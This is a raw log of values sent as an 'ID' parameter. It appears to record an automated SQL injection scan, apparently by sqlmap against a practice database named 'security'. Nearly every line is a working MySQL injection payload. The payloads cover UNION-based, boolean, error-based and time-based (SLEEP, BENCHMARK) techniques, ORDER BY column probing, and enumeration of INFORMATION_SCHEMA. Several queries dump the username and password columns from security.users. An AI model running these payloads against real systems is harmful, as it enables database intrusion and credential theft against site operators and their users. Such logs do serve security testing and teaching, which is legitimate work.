ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x71706b6a71,0x6542735276424762437176786a55666b7145506e755a787a42484a764b45695569446b56516d764c,0x717a707a71)-- -
ID:1' UNION ALL SELECT CONCAT(0x71706b6a71,0x6d6d4a584969436f564b,0x717a707a71),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,0x59585775514f5459534a,0x717a707a71),NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x71706b6a71,0x575a736142546f585270,0x717a707a71)-- -
ID:-1826' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,0x59514868684f5963727370484479664e615a6c6c5655647844786c4c6262764578764370745a6a4d,0x717a707a71),NULL-- -
ID:-9403' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,(CASE WHEN (6696=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                6696) THEN 1 ELSE 0 END),0x717a707a71),NULL-- -
ID:-7183' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x717a707a71),NULL-- -
ID:-4754' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,(CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END),0x717a707a71),NULL-- -
ID:-3977' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,(CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END),0x717a707a71),NULL-- -
ID:-3640' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,(CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END),0x717a707a71),NULL-- -
ID:-8734' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x717a707a71),NULL-- -
ID:-9070' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x717a707a71),NULL-- -
ID:-9287' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,JSON_ARRAYAGG(CONCAT_WS(0x72717a787a65,schema_name)),0x717a707a71),NULL FROM INFORMATION_SCHEMA.SCHEMATA-- -
ID:1
ID:-4456' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,JSON_ARRAYAGG(CONCAT_WS(0x72717a787a65,table_name)),0x717a707a71),NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x7365637572697479)-- -
ID:1
ID:-5291' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,JSON_ARRAYAGG(CONCAT_WS(0x72717a787a65,column_name,column_type)),0x717a707a71),NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x7365637572697479-- -
ID:1
ID:1
ID:-1802' UNION ALL SELECT NULL,CONCAT(0x71706b6a71,JSON_ARRAYAGG(CONCAT_WS(0x72717a787a65,password,username)),0x717a707a71),NULL FROM `security`.users-- -
ID:1
ID:1
ID:1 and 1=2
ID:-1' union select 1, group_concat(column_name), database() from information_schema.columns where table_name='users' -- 
ID:-1' union select 1, group_concat(username), group_concat(password) from security.users -- 
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1'
ID:1'
ID:
ID:123dsa
ID:
ID:52"
ID:93cf)
ID:8488'
ID:93cf)
ID:52"
ID:8488'
ID:1
ID:10c11e8a033a7'
ID:12c5637700ba198f2)
ID:11203fe1d5865a7"
ID:
ID:5f2c947f'
ID:63f312b3f6)
ID:670c1b542ea18a"
ID:
ID:dd63bde5fa2fce'
ID:cdba269af20cda"
ID:2aa5b99bc8e7)
ID:
ID:c883364cfdbb12"
ID:26541e3d)
ID:3705deed1476c7'
ID:
ID:4a0c323537)
ID:0ccbd85b0a1a88'
ID:9ff1fcb465"
ID:
ID:39b6500f"
ID:2e87cc9e2093301e)
ID:6f7214d25d83eb'
ID:
ID:301809173d5d'
ID:661b8cfe"
ID:38dc0f23c4fd57ac)
ID:
ID:f3fdbf41)
ID:f82ef917'
ID:0c92315194"
ID:
ID:a822649b0869eb"
ID:02af31ea'
ID:77dfeb4ac5)
ID:1503753c2819'
ID:1503753c2819"
ID:1503753c2819)
ID:
ID:ae5f36f4e766'
ID:fcfec149)
ID:90726138d9"
ID:
ID:e1d56bc3c34214"
ID:2bab236c'
ID:2bdfadd4d82e)
ID:
ID:3fa7eea00062)
ID:73b764f5"
ID:7c55dbf9'
ID:
ID:52de53c7e28e4a'
ID:89c990c08e"
ID:a95fd3319204f6)
ID:1
ID:1
ID:2681
ID:1).,.,",'.)
ID:1'GirzLd<'">fUIsDB
ID:1) AND 9399=6303 AND (8266=8266
ID:1) AND 6859=6859 AND (1591=1591
ID:1 AND 5595=2732
ID:1 AND 6859=6859
ID:1 AND 8415=8925-- HZPU
ID:1 AND 6859=6859-- FEjD
ID:1') AND 2201=2433 AND ('Zozs'='Zozs
ID:1') AND 6859=6859 AND ('iKZD'='iKZD
ID:1' AND 8153=1114 AND 'yleC'='yleC
ID:1' AND 6859=6859 AND 'RjmV'='RjmV
ID:1' AND 9495=4800 AND 'rdhc'='rdhc
ID:(SELECT CONCAT(CONCAT(0x7171767171,(CASE WHEN (5884=5884) THEN 0x31 ELSE 0x30 END)),0x7171706271))
ID:1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171767171,(SELECT (ELT(8623=8623,1))),0x7171706271,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'jRUI'='jRUI
ID:1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171767171,(SELECT (ELT(3985=3985,1))),0x7171706271,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'vvpr'='vvpr
ID:1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7171767171,(SELECT (ELT(1848=1848,1))),0x7171706271,0x78))x)) AND 'HzMw'='HzMw
ID:1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7171767171,(SELECT (ELT(2276=2276,1))),0x7171706271,0x78))x)) AND 'KfTH'='KfTH
ID:1' AND GTID_SUBSET(CONCAT(0x7171767171,(SELECT (ELT(6734=6734,1))),0x7171706271),6734) AND 'FMtl'='FMtl
ID:(SELECT CONCAT(0x7171767171,(ELT(6924=6924,1)),0x7171706271))
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1';SELECT SLEEP(5)#
ID:1';SELECT SLEEP(5) AND 'soqQ'='soqQ
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))hxNL)#
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))eKIG) AND 'DliK'='DliK
ID:1';SELECT BENCHMARK(5000000,MD5(0x78445766))#
ID:1';SELECT BENCHMARK(5000000,MD5(0x74644d52)) AND 'acUG'='acUG
ID:1' AND (SELECT 2279 FROM (SELECT(SLEEP(5)))uSQT) AND 'vGnd'='vGnd
ID:1' AND (SELECT 2279 FROM (SELECT(SLEEP(0)))uSQT) AND 'vGnd'='vGnd
ID:1' AND (SELECT 2279 FROM (SELECT(SLEEP(5)))uSQT) AND 'vGnd'='vGnd
ID:1' ORDER BY 1-- -
ID:1' ORDER BY 9303-- -
ID:1' ORDER BY 10-- -
ID:1' ORDER BY 6-- -
ID:1' ORDER BY 4-- -
ID:1' ORDER BY 3-- -
ID:1' UNION ALL SELECT CONCAT(0x7171767171,0x63465564616376766b5a676c447243585455486d51796d7066697262556c7a5876484d79766b6157,0x7171706271),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7171767171,0x786a474f694c52717354556d7957776b796971614c78516b766845786a7844654a4a4f6e76777543,0x7171706271),NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7171767171,0x6842466d66614a70687a494e456f68444d767a5445667567724c5a466f68525170717268614f7468,0x7171706271)-- -
ID:1' UNION ALL SELECT CONCAT(0x7171767171,0x47636c73574d4779546d,0x7171706271),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7171767171,0x74724d4b4b6d6d635053,0x7171706271),NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7171767171,0x435343416b4f76787678,0x7171706271)-- -
ID:-1985' UNION ALL SELECT NULL,NULL,CONCAT(0x7171767171,0x737174676864506d51546968666c4e586570755a716f6d4b6f50476d6b49797375465672746b6671,0x7171706271)-- -
ID:-8170' UNION ALL SELECT NULL,NULL,CONCAT(0x7171767171,(CASE WHEN (1495=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1495) THEN 1 ELSE 0 END),0x7171706271)-- -
ID:-5996' UNION ALL SELECT NULL,NULL,CONCAT(0x7171767171,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x7171706271)-- -
ID:-3224' UNION ALL SELECT NULL,NULL,CONCAT(0x7171767171,(CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END),0x7171706271)-- -
ID:-6976' UNION ALL SELECT NULL,NULL,CONCAT(0x7171767171,(CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END),0x7171706271)-- -
ID:-7388' UNION ALL SELECT NULL,NULL,CONCAT(0x7171767171,(CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END),0x7171706271)-- -
ID:-1622' UNION ALL SELECT NULL,NULL,CONCAT(0x7171767171,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x7171706271)-- -
ID:-5191' UNION ALL SELECT NULL,NULL,CONCAT(0x7171767171,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x7171706271)-- -
ID:-9479' UNION ALL SELECT NULL,NULL,CONCAT(0x7171767171,JSON_ARRAYAGG(CONCAT_WS(0x666874787078,schema_name)),0x7171706271) FROM INFORMATION_SCHEMA.SCHEMATA-- -
ID:2
ID:3
ID:4
ID:
ID:
ID:1
ID:1
ID:1
ID:
ID:1
ID:1
ID:1
ID:1
ID:1
ID:2341
ID:1)('.,)".,)
ID:1'SiuCXi<'">dWCcGg
ID:1
ID:1
ID:7485
ID:1)')"(..),.
ID:1'mrNTxN<'">NOJNWh
ID:1) AND 2804=5970 AND (2582=2582
ID:1) AND 2172=2172 AND (8984=8984
ID:1 AND 4670=6152
ID:1 AND 2172=2172
ID:1 AND 1317=7982-- xutw
ID:1 AND 2172=2172-- HlRN
ID:1') AND 2167=2273 AND ('FOGr'='FOGr
ID:1') AND 2172=2172 AND ('liHW'='liHW
ID:1' AND 3310=2206 AND 'JyKD'='JyKD
ID:1' AND 2172=2172 AND 'cUis'='cUis
ID:1' AND 2393=6936 AND 'yXlB'='yXlB
ID:(SELECT CONCAT(CONCAT(0x7176626a71,(CASE WHEN (8589=8589) THEN 0x31 ELSE 0x30 END)),0x716a626271))
ID:1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176626a71,(SELECT (ELT(8003=8003,1))),0x716a626271,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'nekK'='nekK
ID:1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176626a71,(SELECT (ELT(6405=6405,1))),0x716a626271,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'iZee'='iZee
ID:1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7176626a71,(SELECT (ELT(9261=9261,1))),0x716a626271,0x78))x)) AND 'FRIH'='FRIH
ID:1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7176626a71,(SELECT (ELT(5037=5037,1))),0x716a626271,0x78))x)) AND 'fviZ'='fviZ
ID:1' AND GTID_SUBSET(CONCAT(0x7176626a71,(SELECT (ELT(8107=8107,1))),0x716a626271),8107) AND 'rQeV'='rQeV
ID:(SELECT CONCAT(0x7176626a71,(ELT(9698=9698,1)),0x716a626271))
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1';SELECT SLEEP(5)#
ID:1';SELECT SLEEP(5) AND 'UPeU'='UPeU
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))Jgev)#
ID:1';(SELECT * FROM (SELECT(SLEEP(5)))oSMY) AND 'iskH'='iskH
ID:1';SELECT BENCHMARK(5000000,MD5(0x446b6975))#
ID:1';SELECT BENCHMARK(5000000,MD5(0x5a5a566d)) AND 'anDa'='anDa
ID:1' AND (SELECT 9868 FROM (SELECT(SLEEP(5)))oAKX) AND 'CTAA'='CTAA
ID:1' AND (SELECT 9868 FROM (SELECT(SLEEP(0)))oAKX) AND 'CTAA'='CTAA
ID:1' AND (SELECT 9868 FROM (SELECT(SLEEP(5)))oAKX) AND 'CTAA'='CTAA
ID:1' ORDER BY 1-- -
ID:1' ORDER BY 9327-- -
ID:1' ORDER BY 10-- -
ID:1' ORDER BY 6-- -
ID:1' ORDER BY 4-- -
ID:1' ORDER BY 3-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7176626a71,0x714a566c466a4477555249476f6964707044524d784c79544c47667476626b435057646244597441,0x716a626271),NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7176626a71,0x4479664b6e44634e4d65584658687448476d7a50546a50544d4e544a544d55616655725569465356,0x716a626271)-- -
ID:1' UNION ALL SELECT CONCAT(0x7176626a71,0x776d494f49644b624262687a774176575763674d625a69666f767762666a546c745968746e476945,0x716a626271),NULL,NULL-- -
ID:1' UNION ALL SELECT NULL,CONCAT(0x7176626a71,0x6651525952734f6a4a6c,0x716a626271),NULL-- -
ID:1' UNION ALL SELECT NULL,NULL,CONCAT(0x7176626a71,0x584172714e7353574350,0x716a626271)-- -
ID:1' UNION ALL SELECT CONCAT(0x7176626a71,0x64425075685171594c56,0x716a626271),NULL,NULL-- -
ID:-9615' UNION ALL SELECT NULL,NULL,CONCAT(0x7176626a71,0x66706a4c474f5959486b536563766849757971477374554d4e714170586f695a7758425a46427a4b,0x716a626271)-- -
ID:-2434' UNION ALL SELECT NULL,NULL,CONCAT(0x7176626a71,(CASE WHEN (9189=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                9189) THEN 1 ELSE 0 END),0x716a626271)-- -
ID:-8538' UNION ALL SELECT NULL,NULL,CONCAT(0x7176626a71,(CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END),0x716a626271)-- -
ID:-3923' UNION ALL SELECT NULL,NULL,CONCAT(0x7176626a71,(CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END),0x716a626271)-- -
ID:-9316' UNION ALL SELECT NULL,NULL,CONCAT(0x7176626a71,(CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END),0x716a626271)-- -
ID:-2985' UNION ALL SELECT NULL,NULL,CONCAT(0x7176626a71,(CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END),0x716a626271)-- -
ID:-5401' UNION ALL SELECT NULL,NULL,CONCAT(0x7176626a71,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x716a626271)-- -
ID:-9252' UNION ALL SELECT NULL,NULL,CONCAT(0x7176626a71,(CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END),0x716a626271)-- -
